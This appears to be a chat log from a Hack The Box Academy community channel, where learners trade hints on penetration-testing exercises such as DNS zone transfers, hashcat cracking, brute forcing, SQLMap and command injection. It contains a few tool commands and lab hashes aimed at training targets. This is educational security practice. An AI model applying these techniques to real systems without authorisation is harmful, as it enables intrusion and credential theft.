yea just found it on the htb pwnbox, i will check if it's there too on the academy pwnbox, thx 🙂

NP, sorry I didn't see your message sooner

Did you solve it?

@dense hearth Hey pall, any meaningful hints to solving DNS enum? I've dig'd each address and tried many of the lists...unsure what im doing wrong

No

I think solve here i try

Yeah I experimented with the messaging feature and password reset but I haven't gotten any leads yet

Look he says , the new insite message function

@acoustic owl yooo

Yes I see, did you figure out how to exploit it?

Hello all,
I'm looking for someone who finished the "Intro to Assembly Language" module.
I'have some questions of this question in the Skills Assessment chapter:
"Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'."

can someone help me out with the skill assessment for broken authentication?

i know you can ||enumerate users via the message panel but i haven't been able to find any valid ones||

Found this interesting, not sure why this is happening so I would appreciate if anyone could find the reason for this. I am working on the Introduction to Bash Scripting Module and the first Exercise wants to character count of the 35 generation base64 conversion. Using bash with the following methods; echo -n $var | wc -c OR echo -n $var | awk '{print length}' OR echo ${#var} all produce exactly a count of 1 less than the actual answer. Which I had to tee to a file for python to determine the length to answer the exercise question. ???

is there a way to copy/paste from kali to pwnbox and vice versa?

@urban valley I'm not able to copy/paste into pwnbox , it's definitely a pain

rip

If you log in to HTB Academy from any OS and spawn a Pwnbox instance, you should be able to use the clipboard feature in the bottom right corner of the Pwnbox VNC browser session to copy and paste input & output to & from Pwnbox.

Yes, You have to open the pwnbox in full-screen and you have a button feature for copy/paste

Ok my mind is blown. Thank you gentlemen 🙂

I'm connecting from my own box. The command I'm using is sudo xfreerdp /v:<IP_address_given> /u:<user_name> /p:<password>

Take the smallest list. If you can't find the host with it, use the next larger list. 5000 entries are too many. There are smaller lists in SecLists

take a look at the note on the support page.

You need to find another username.

I know, but I haven't found another username with any wordlist

Hi there, I am stuck in the module SQL Injection Fundamentals page Query results. My problem is that i can't connect to the given target. The Error states:
ERROR 2002 (HY000): Can't connect to MySQL server on '46.101.61.42' (115)

Any hints?

The message is vague. How do I figure out what departments are available when wordlists aren't working? And when it says "by adding your country code" is it referring to digits or letters? And does it want them prepended or appended? With a dot between the words or not? lol I just need a nudge in the right direction, short on time rn

Look at the note regarding Country Code.

Can you give a nudge for the format?

|| username.xx ||

Thank you

This is the toughest skill assessment I've faced so far

If you don't mind, can you give another hint? Once you have the two accounts, what's next? My wordlist that matches the password requirements doesn't work and changing the cookie value gave me an error message

Hi,

I've been banging my head on the footprinting DNS question about the FQDN with the last octet of x.x.x.203. I've went through each of the dig commands in the section, I see the sub-domain but I can't find the answer, can someone put me in the right direction as I've spent about 5-6 hours researching but I can't anything. Please help, I'm at the frustrated stage!

You need to find all the zones.

There are DNS servers that allow zone transfer (dig axfr) from anyone. But you can also configure DNS servers to allow zone transfer only from specific servers.
Then it is necessary to identify such a zone as a zone and then bruteforce it.

You can find a zone if you query a suspected zone with entries that usually occur in zones, such as www, ns, ns1, mail, mail1, etc.

That question drove me crazy. You can DM me if you still need help.

hey anyone ever had their internet drop completely while using burp in a vm? i was in the middle of the web proxies module and my internet completely dropped out. i shut down my laptop and my net came back. anyone else ever experience this?

reoccurring issue after opening burp suite in my vm.

yes

word. is it something i have to live with or is there a fix?

That seems unusual but I have heard of stranger things. Does the internet just drop on your VM or for your computer as a whole?

Is there anyone that could help me with information gathering module ? This one is kicking my ass 😓

Where exactly are you stuck?

The fourth question (What is the FQDN of the IP address 10.10.34.136?) from Active Subdomain Enumeration

You need to find all the zones.

I tried everything I could

@west canopy I just live with it, it happens like once a week, it happens if i do nmap sometimes too, drops internet on computer as a whole. It scared me the first couple times it happened, i thought my isp could tell I was hacking and cut my internet 🤣

ok. that was my exact though train. i was freaking out abit.

my whole network drops off until i shut my laptop down.

it happened around 4 times until i realized it was my vm causing the issue. i always snapshot before i install new tools or update. so i was able to revert back to before it happened. everything seems to be working fine now.

What's the user for the SSH attack in the Passwords Attack module?

I ran net users and used the provided password list against all of them but none of them worked.

Try to query the subdomains you found with dig axfr

ok, thanks

Have you run Wireshark to find out why your whole network can be disrupted by your VM?

I have not. It hasn't happened since I went back to the previous snapshot. I'm gonna try again when I get back to my laptop

yes, it would be really exciting to know why this happens.
It has never happened to me until now. I hope that remains so

I feel like i may be blind or this box is wrong "Enter "THIS COMMAND" to find the version.....version shown = 7.1.3......WRONG"

"Shells & Payloads

Anatomy of A Shell i'm straight up not understanding how 7.1.3 for the version number is wrong

It shows a new release is avialbable, but i'm not the one maintaining these boxes so really having a hrda time understanding why I'm wrong?

In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.

Reload the Academy page and then try again

still doesnt accept

@low vine Read the question carefully, it is asking for the Edition of powershell being used 🙂

https://tenor.com/view/war-dogs-war-dogs-movie-stressed-facepalm-jesus-help-me-gif-16017210

Got it lol but still ^^

Hi, can someone help me with Cracking with Hashcat- Hybrid Mode? I keep getting bypassed. Here's my syntax: hashcat -a 7 -m 100 hash.txt -1=01 '?d?s' rockyou.txt

hash.txt = 978078e7845f2fb2e20399d9e80475bc1c275e06

@urban valley i got you dawg

I know this isn't the right place but im having issues

Ive gotten this thing on my computer. I did an update. had a alert about win32/lodi i believed it to be from surfshark. theres been alot of issues. well i continue to scan and find this

ok so. i looked at the file location. It was a .md file that i had created and took notes on for a reverse shell and prolly had some code in it. lol I think im safe?

I mean... how confident are you that it's a file you put there yourself? lol

Your picture has the correct answer 😀

It might have been.....but i was giving the version not the "edition"

<

<

<

well it's a obsidian file i named reverse shell and entered code into it. It's been picking them all up throughout the day now

@hazy grotto Your probably fine but I would still triple check

I'm currently on this problem as well. i feel like im missing something like usual

yeah, im always a little paranoid so I will be keeping a very close eye on things

@lone comet i just got it. lol wow.

Hello everyone, I'm having a problem with the labs

can anybody help me?

@acoustic owl
i could use you right now lol. you seem to be an expert on FQDN dns footprinting question

Which labs exactly?

lol, where do you need help?

iim going to dm you. i believe im on the right path

Hey team

any idea of how to fix this?

Its supposed to show a full list of hashes

@woeful oxide which section is that from? I can test it on my end

hyy

i was cloneing beef

its giving eroor

@languid fjordhyy sir soory for ping but i am munt in general chat

module - Web request -> HTTP Methods ->GET
Could someone help me with below question. In my instance, i coudnt find the search.php?search= parameter in dev tools.

Question :The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.

DM me

Add in academy exam certificate bug bounty

[Edited]
Nvm. After restarting the target all worked fine and i was able to get both flag 🙂
//
Hii. Do you have some tips for the first flag ?
Am actually trying to exploit the XSS vuln but i have some trouble with the API. "Something went wrong :(" when i send my vuln URL

@west rampart
Hello l have questions

ask

Cracking passwords with hashcat

I clicked PURCHASE
Exam vouchers

Will my account be debited?

Please open up a ticket.

this

Because currently I don't want to, but I clicked on PURCHARE

You can open a ticket by clicking on the chat bubble bottom right.

When?

Now.

Hello! I'm having troubles with the "CRACKING PASSWORDS WITH HASHCAT" module, "WORKING WITH RULES" submodule. I cannot crack the hash even though I feel like I have everything setup fine. the hint states, "Create a custom rule and combine it with the rockyou.txt wordlist. This exercise was created in the year 2020" which is exactly what I'm doing. Screenshot should show my attempt. Would anyone be willing to take a look and point out where I'm going wrong? Thanks!

Here's some of the info for someone to set it up:
Hash: 46244749d1e8fb99c37ad4f14fccb601ed4ae283
My rule: $2 $0 $2 $0

Your rule isn't right.

Read the question again :)

You're right! I misunderstood! Thank you! I cracked it 🙂

Hello! I'm having troubles with the **SHELLS & PAYLOADS **module, on PHP Web Shells section. I cant connect with the proxy and I don't know what I have to do, if anyone have done this section, pls help me

Another freshie?

Hello everyone, am a beginner in htb-academy. Can anyone guide me how to complete this. Tried whatever i understood from the section. But nothing is working.

Module: File Inclusion
Section: Basic Bypasses

preserve the approved path

then start traversing

I have the same problem

Did you get the approved path?

I do not quite understand what you mean...

DM me

right but which section of the module? "Identifying Hashes" right?

@jagged summit feel free to DM me

right

its supposed to work like this

and i got this

well in the second screenshot , you appear to not actually have a file called hashes.txt

Need some help with command injection skill assessment

Do we need to create a new account (to login in the HTB Academy) because I cannot login with my HTB account ?

Yes academy needs a separate account

@rustic sage sure just ping me if you still need help

@narrow wasp feel free to DM me 🙂

hey guys, is there any error on the module File Inclusion, Log Poisoning? I already got the second question, which is the flag.. but the first question just don accept my answer

it ask me what's the command "uname -r" output.. i write it, and it tells me its wrong

@fast timber DM me

Is anyone able to help with the last two questions on the SMB module of Footprinting? I can't seem to get pass them

feel free to dm me

I am having an issue retrieving flag1 from Linux Local Privilege Escalation - Skills Assessment, I have flags 2 through 5 and am not sure why I cannot get flag 1. Would someone be able to point me in the right direction?

@severe birch check for hidden files/folders 🙂

I'd found information mentioning flag1 in a hidden file, but it was not located where is was referred to in that hidden file.

Hi all, can I DM anyone regarding the final assessment of file uploads? I found the uploading page, but even for requests which should be valid i always get "Only images are allowed"

@severe birch trying doing something like ls -laR from inside the htb-student directory

Somehow missed/skipped the exact file/folder I needed to look into the first 2 times.... Thanks!

@knotty hemlock DM me brother!

Hey everyone, having a little trouble on the XSS module - XSS Discovery section - last question. I've summitted the type of xss injection the server was vulnerable to but somehow not getting the answer correct

@lavish needle DM me dawg 🙂

@runic wave that should be correct

Hey all! I've been stuck on module: CRACKING PASSWORDS WITH HASHCAT, submodule: Cracking Common Hashes. I'm trying to crack the hash 7106812752615cdfe427e01b98cd4083.

I've been poking around google and I found someone saying that I'm not safe to assume this is an md5 hash. This left me confused as how to interpret the output of hashid.
Hashid gives me an output of:
<SNIP>
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
<SNIP>

Since MD2 has no hashcat mode, I went to the next which is MD5. Are all of these types equally likely meaning I should try all of them, or is there another way to look at this output?

Also, when applying built in hashcat rules I am getting some instances of 400 Billion+ combinations that will easily take 6+ hours to run. I feel like there is information that I am failing to imply at this point since going in the direction I am will seemingly take me weeks.

Would someone be willing to point me in the right direction or help talk me through what I should be implying to crack this hash?

Thank you!

@rotund mountain DM me brother!

Feel like I’m missing something here, working on the Linux Fundamentals module. The question is: “Use the systemctl command to list all units of services and submit the unit name with the description Load AppArmor profiles managed internally by snapd.”

systemctl list-units —type=service |grep armor yields only one result, apparmor. When submitting apparmor or apparmor.service, both are wrong. Grepping for snapd yields no results, and profiles lists only the same apparmor service which doesn’t appear to be correct. Am I missing something on my web based vm instance, something not installed correctly?

@raw bay you are super close, feel free to DM me!

@west canopy If I’m not missing anything and just need to figure it out, I’ll do that, but wasn’t sure. Appreciate the response, will dm if the wall starts hurting my head. 👍

clear

pwd

Hey guys, any hint to Password Attacks - Mutation? I got 3 valid users and after passing the supplied list of passwords to the specified rule and applying sort and removing the duplicates I got a list with the size of about 92000 entries. But if these lists are used in the hydra, all processing will take about 30h to be completed. My question is, how did the author expect the exercise to be resolved? That password list can be build in a lot of variety of pre-processing or ordering that maybe not match the middle processing time of the used list of the author. (anyway, the exercise dont give any cube. But this is a little frustrating)

@modern epoch Wish i could help brother , I haven't tried that module yet

I know for the Hydra module, typically it would crack the password very quickly . And if it ended up taking longer than a minute or two, it's because you were using the wrong wordlist or command. Not sure if that's the case with this module though.

Thanks man, no problem. At really this module needs a review. The technique taught is not all correct, it will produces duplicates passwords. But lets see whats happens here, 🙂

is there anywhere we can get a list of the changes made to updated modules?

@lost kayak You check the "Change Log" in the module Summary. It does not give specifics however (i.e., it doesn't say which sections were added or changed)

Hey everyone, I'm working through the Linux Fundamentals module and I'm stuck on the Working with Web services final question. It's asking to "start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080." I have submitted the following "php -S 127.0.0.1:8080" "php -S localhoast:8080" "php -S localhost -p 8080" and "php -S 127.0.0.1 -p 8080". I did some googling and everything seems to say that that's the way you do it. But I keep getting a message that it's wrong. (I also tried "-S 127.0.0.1:8080" etc.) Does anyone have any idea what I'm doing wrong. It seems to work on my VM.

You are correct, all of those are equally likely.

@ember crest you are super close. Try: php -S 127.0.0.1:8080

I don't believe you need to be trying such large attacks for this though, i would start with smaller stuff on each mode and build up if it fails

If i'm not mistaken, the point is to provide an example of why guessing the hash type based off purely how it looks/is formatted isn't reliable

Also i know the module is a bit out of date at this point but if you are using recent hashcat, we've added that functionality inline

thanks man! I dont really get what i did wrong but it worked! Thanks!!

I have this

but when i try to ssh to the target this happen

@weary sand try doing: ssh user1@159.65.81.40 -p 31185

thank you :)

Only 31 hours to go!

hello everyone...good morning !!

how to share my HTB profile on linkedin

??

@true owl bruh plz tell me is this website teach me from basics

@agile spire Hy bro plz guide me from where I can learn basics

Well, seems like bot got to it before me

Hi, anyone knows about the business price of hackthebox academy? How it works?

https://academy.hackthebox.com/academy-for-business

Hey guys, in "Password Attacks", section "Password Mutations" what is the format of the found flag must be used? After cracking the file the flag inside is not recognized as a valid answer.

probably u checked for spaces,tabs?

yo, quick Q: does the HTB CBBH voucher includes additional training/labs?

we have redesign the question in that section to speedup the process, refresh the page to see the redesigned question

did anyone finish Web Service & API Attacks - Skills Assessment? I think there is a bug there, but I might be wrong

Hi! I have a question about module: 'Using Web Proxies'

There is a task:

Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

I cannot use BurpSuite so I m using ZAP, and for some reason after writing in all the correct info in MSF, the req/res isnt captured

set PROXIES HTTP:127.0.0.1:8080 should do the trick?

thats what I did, I followed the exact manual:

$ msfconsole

msf6 > use auxiliary/scanner/http/robots_txt
msf6 auxiliary(scanner/http/robots_txt) > set PROXIES HTTP:127.0.0.1:8080

PROXIES => HTTP:127.0.0.1:8080


msf6 auxiliary(scanner/http/robots_txt) > set RHOST 142.251.36.142

RHOST => 142.251.36.142


msf6 auxiliary(scanner/http/robots_txt) > set RPORT 80

RPORT => 80


msf6 auxiliary(scanner/http/robots_txt) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hmm I would try also with proxychains

proxychains:

http 127.0.0.1 8080

and that is working, because this command runs and shows in zap with no problem:

proxychains curl http://google.com/robots.txt -iL --cacert ~/Downloads/owasp_zap_root_ca.cer

Resolved by making a Kali VM and using Burp haha

hey ! Is anyone as done the ATTACKING WEB APPLICATIONS WITH FFUF module ? I'm stuck at the filtering section and I don't understand why

@dry pumice i did it, but it was some time ago

I think my problems is with etc/hosts file

I add the domain as ask but I don't know, I got nothing when I try to run the given example command

how does Your etc/hosts looks like?

if i remember correctly, You have to consider the subdomain in the hosts file

subdomain ?

I just add admin.academy.htb to the file

but You are asked to fuzz the subdomains, arent You?

it is something like <subdomain>.academy.htb

yes, but in admin.academy

...

what is the question exactly?

I read the wrong question 🤦‍♂️

Hello, can somebody help me: every time I connect to the ssh server after a few minutes the terminal freezes and I can't do anything.

Linux Fundamentals
|----> System Information

vpn drops probably

That is not the correct flag for that section...

Thanks. Well, the password I found was for the user kira initially. So, inside Documents -> Notes.zip has the flag I have used 🙂

Should I use parrot for HTB Academy or am I good using Kali?

Well, it was access got in a not intended way that tricked us.

You may use any VM you feel comfortable with, or may use pwnbox directly from your browser

i dont need the answer, i just need a nudge on the command injections assesment. i am 100% certain i found the injection point. i have tried many kinds of bypass methods, so i just want to make sure. Am i able to add a method after what is ran by the file manager script?

not method, sorry, a command.

like i know on the back end it is 100% using the "mv (original file) (new file location)"

@modest moth DM me dawg 🙂

Anyone else having trouble getting targets to spawn?

someone speaks Spanish

@twin raft speaks spanish

Hola que onda

Hola

Yo hablo español

Yo quiero aprender

Informática

@twin raft

Va y cuál es tu duda?

Ese es el problema 😞

No se nada 😣

Ok entonces quieres seguridad informática y no sabes por donde empezar?

Me la paso intentando aprender por mi cuenta pero no encuentro donde aprender

Asi es quiero aprender

Bueno, este es un muy buen lugar pero tal vez te parezca un poco abrumador al principio, si quieres manda dm y te ayudo con eso

Jajaja thanks man, I'll help the spanish bro

gracias y lo siento, mi espanol es muy malo

Yo no hablo nada de ingles:(

ingles es stupido

deepl.com ayuda 🙂

🎉

is there anyone who could help me with the broken auth module? section Cookie Bruteforcing

Yeah bro, what's your issue?

Lo pondre en práctica!

I do a lot with deepl. deepl is my friend 🙂

I'm looking for a mentor, I'm a beginner

Yea, I talked to support. There is an ongoing issue on the server side. Sit tight, they are working on it.

Thank you

yes, but deep translates better, most of the time at least.

You are in the right place, this channel is like crowdsourced mentoring

Just start in htb!

ok)

Or if u want, send dm and I'll tell you some recommendations

no

hacking isnt real

just do your best

termux is of any use?

Can anyone provide the word list needed for the Using Web Proxies module? For the burp intruder section, the question that asks to find the .html file in the admin directory.. Ive tried the common.txt one used In that section and have had 404 on every request. I can't tell what I'm doing wrong if I don't know the list I should be using.

common.txt is the correct list...it's likely something else you're missing

Well that's good news sort of. Thank you for confirming that, I was going crazy.

@broken warren Just tested on my end, was able to get the flag using common.txt

I respawned and used the ip:port/admin/index.html as my search. Intercepted that in burp and sent it to intruder, loaded my word list, and set to runtimefile. The first request in the attack was 304 and the rest 404 shouldn't my first request be 200?

You want the payload position to look like this:

also to note, make sure you've added Payload Processing to skip the unnecessary stuff

can someone help with sql essentials flag4. I've got the --data option, but not sure about the file?

That helped get rid of my 304 status code. I had two extra headers below my connection one.

Fun mod, big whoopsie tho

How was it?

It was chill, the assessment could have been hard, but they leaked the solutions 😂 😫

@grand locust I think you just copy/paste the full HTTP request into a file

@livid pier intentionally or no?

lol I dont think so

It was the first super cheese I found

Kinda happy about that

Are the preceding sections yes/no questions or do you have to find flags?

A mix

Even if they arnt, they are super easy tho

Finally got the flag, much thanks to those who steered me in the right direction

It shouldnt have been a medium mod

But ya the mods with Yes/No questions are disappointing. I question if they cant make a question for us to practice the exploit how will we use that exploit IRL?

Use Burp to capture the HTTP header and create a file from it.
Then use this file in SQLMap with the flag -r

guys, for some reason i can not ssh to the host im given, neither i can do anything with it (in the Service Authentication Brute Forcing section of Login brute forcing module). It keeps saying the host is down
https://cdn.discordapp.com/attachments/695197205186871313/958447642680127528/unknown.png
https://cdn.discordapp.com/attachments/695197205186871313/958448090799538256/unknown.png

brute forcing it also takes like 40 minutes without success

an npm -Pn scan shows the port (22) is filtered. I'm kinda stuck and really don't know what to do. Any help?

@rustic sage DM me brother 🙂

I think this is a very easy question, How do you break a command in a remote connection, without breaking your remote connection as well.

HTB Academy > Path > Breaking Into HTB > Web Requests > HTTP Methods > GET

─[us-academy-2]─[10.10.14.118]─[htb-ac454410@pwnbox-base]─[~]
└──╼ [★]$ curl 'http://138.68.180.98:32286/search.php?search=le' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: /' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://138.68.180.98:32286/' -H 'DNT: 1' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Connection: keep-alive' -H 'Sec-GPC: 1'
Please use cURL─[us-academy-2]─[10.10.14.118]─[htb-ac454410@pwnbox-base]─[~]
└──╼ [★]$

I don't know what I'm doing wrong lol

I feel like I'm following the directions but the only response I'm getting is "please use curl" even though I obviously have the curl command in there

Try dropping out the unnecessary stuff from the command, your pasting the entire firefox command

for example : curl 'http://138.68.180.98:32286/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4='

also make sure you have your own authorization code, you should be able to pull it from your browser

yes, I was able to get the flag now. thanks so much